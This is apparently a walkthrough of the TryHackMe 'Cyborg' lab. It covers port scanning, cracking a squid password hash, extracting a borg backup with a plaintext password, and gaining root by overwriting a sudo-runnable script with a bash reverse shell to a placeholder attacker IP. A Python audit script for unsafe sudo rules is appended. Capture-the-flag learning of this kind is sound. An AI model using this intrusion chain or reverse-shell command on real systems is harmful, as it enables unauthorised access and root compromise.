Cyborg

Room Details

TryHackMe Cyborg room contains:

  • Service Discovery

  • Web Content Discovery

  • Hash Cracking

  • Data Decompression

  • Privilege Escalation

Target

  • IP: 10.10.230.194

Service Discovery

  • Scan for open ports with nmap

$ nmap -sC -sV -A -sS -Pn -oN nmap.txt 10.10.230.194
Nmap scan report for 10.10.230.194
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   279.37 ms 10.2.0.1
2   ... 3
4   514.99 ms 10.10.230.194

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  • Services Discovered

    Service   Port   Version
    HTTP      80     Apache 2.4.18
    SSH       22     OpenSSH 7.2p2

  • OS: Ubuntu from service description

  • Answer the first three questions of Task 2

Web Content Discovery

  • Scan for directories using gobuster

    gobuster dir -u http://10.10.230.194 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

  • Directories Discovered

    Dir      Description    Files Found
    /admin   homepage       archive.tar (found via the archive dropdown)
    /etc     squid proxy    squid password and configuration files

Analyzing Directories

  • Under /etc we found /etc/squid/passwd, which contains a password hash, and the squid config file /etc/squid/squid.conf

    # reading files
    
    # /etc/squid/passwd
    music_archive:{REDACTED}
    
    # /etc/squid/squid.conf
    auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
    auth_param basic children 5
    auth_param basic realm Squid Basic Authentication
    auth_param basic credentialsttl 2 hours
    acl auth_users proxy_auth REQUIRED
    http_access allow auth_users

Cracking Password Hash

  • Store hash into a file passwd_hash.txt

  • Crack the hash using john

    john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

    squidward (music_archive)

  • We've successfully found the password from the hash

Analyzing Tar file

  • extract tar file

    tar -xvf archive.tar

  • Found a readme file that points to the borg documentation page

  • We need to install borg to extract the files from the compressed format

  • Install borg

    sudo apt install borgbackup -y

    This is for Debian-based distributions; for other distributions, refer to the borg installation documentation

  • decompress extracted files from archive.tar using borg

    borg extract ./home/field/dev/final_archive::music_archive

  • After the files are decompressed successfully, the data turns out to be a home directory backup of alex's account

  • Found Password from /home/alex/Documents/note.txt

    Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
    
    alex:{REDACTED}

Login with ssh

  • Login using alex's credentials

    ssh alex@10.10.230.194
    alex@10.10.230.194 password: # enter password from note.txt
    Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
    
    * Documentation: https://help.ubuntu.com
    * Management: https://landscape.canonical.com
    * Support: https://ubuntu.com/advantage
    
    27 packages can be updated.
    0 updates are security updates.
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    alex@ubuntu:~$

  • We now have access to alex's account

Get User Flag

alex@ubuntu:~$ cat user.txt
flag{REDACTED}

Privilege Escalation

  • Check for executables runnable with sudo

    alex@ubuntu:~$ sudo -l
    Matching Defaults entries for alex on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User alex may run the following commands on ubuntu:
        (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

    We can run /etc/mp3backups/backup.sh with root privileges, without a password

  • Check whether file is writable

    alex@ubuntu:~$ ls -la /etc/mp3backups/backup.sh
    -r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh

    We cannot write to the file, but it is owned by alex, so we can change its permissions using chmod

  • Allow all permissions to the files

    alex@ubuntu:~$ chmod 777 /etc/mp3backups/backup.sh

    Note: Allowing all users rwx permissions isn't good practice, but for ease I've granted them those rights

  • Overwrite the file with a bash reverse shell (run on the target as alex)

    alex@ubuntu:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/backup.sh

    The reverse shell will connect back to the attacker's machine on port 4444

  • Start netcat on attacker's machine

    nc -nlvp 4444

  • Execute the bash script from the target machine

    alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh

  • Now we've successfully rooted the machine

    $ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.230.194] 36492
    root@ubuntu:~#
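The root cause here is a sudo rule that runs, as root, a script owned by the very user allowed to invoke it. The following audit script is an added example (not part of the room or the original writeup): it parses `sudo -l` and `ls -la` output, modelled on the output shown above, and flags any sudo target the invoking user owns or that is group/world writable. The sample input is constructed; the apt-get line is a made-up benign control case.

```python
import re

# Constructed sample input, modelled on the `sudo -l` and `ls -la` output above.
SUDO_L = """\
User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
    (root) /usr/bin/apt-get update
"""
LS_LA = """\
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh
-rwxr-xr-x 1 root root 25800 Jun 11  2020 /usr/bin/apt-get
"""

# "(runas) TAG: TAG: /path ..." as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)")
# mode, links, owner, group, size, date..., path as printed by `ls -la`
LS_RE = re.compile(r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+.*\s(?P<path>/\S+)$")

def parse_sudo_l(text):
    """Return [(command_path, runas, set_of_tags)] from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            tags = {t.strip(": ") for t in m.group("tags").split()}
            rules.append((m.group("cmd"), m.group("runas").strip(), tags))
    return rules

def parse_ls_la(text):
    """Map path -> (mode string, owner, group) from `ls -la` output."""
    files = {}
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m:
            files[m.group("path")] = (m.group("mode"), m.group("owner"), m.group("group"))
    return files

def audit(sudo_text, ls_text, invoking_user):
    """Flag sudo targets the invoking user could alter before root executes them."""
    files, findings = parse_ls_la(ls_text), []
    for cmd, runas, tags in parse_sudo_l(sudo_text):
        if cmd not in files:
            continue
        mode, owner, group = files[cmd]
        reasons = []
        if owner == invoking_user:   # owner may chmod the file, so r-x is no protection
            reasons.append("owned by invoking user (can chmod, then rewrite)")
        elif owner != "root":
            reasons.append(f"owned by non-root user {owner}")
        if mode[5] == "w":
            reasons.append(f"group-writable ({group})")
        if mode[8] == "w":
            reasons.append("world-writable")
        if reasons:
            findings.append({"command": cmd, "runas": runas,
                             "nopasswd": "NOPASSWD" in tags, "reasons": reasons})
    return findings
```

The fix on the box side is the mirror image of the finding: the script and its directory should be owned by root and writable only by root.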

Get Root Flag

root@ubuntu:~# cat root.txt
flag{REDACTED}
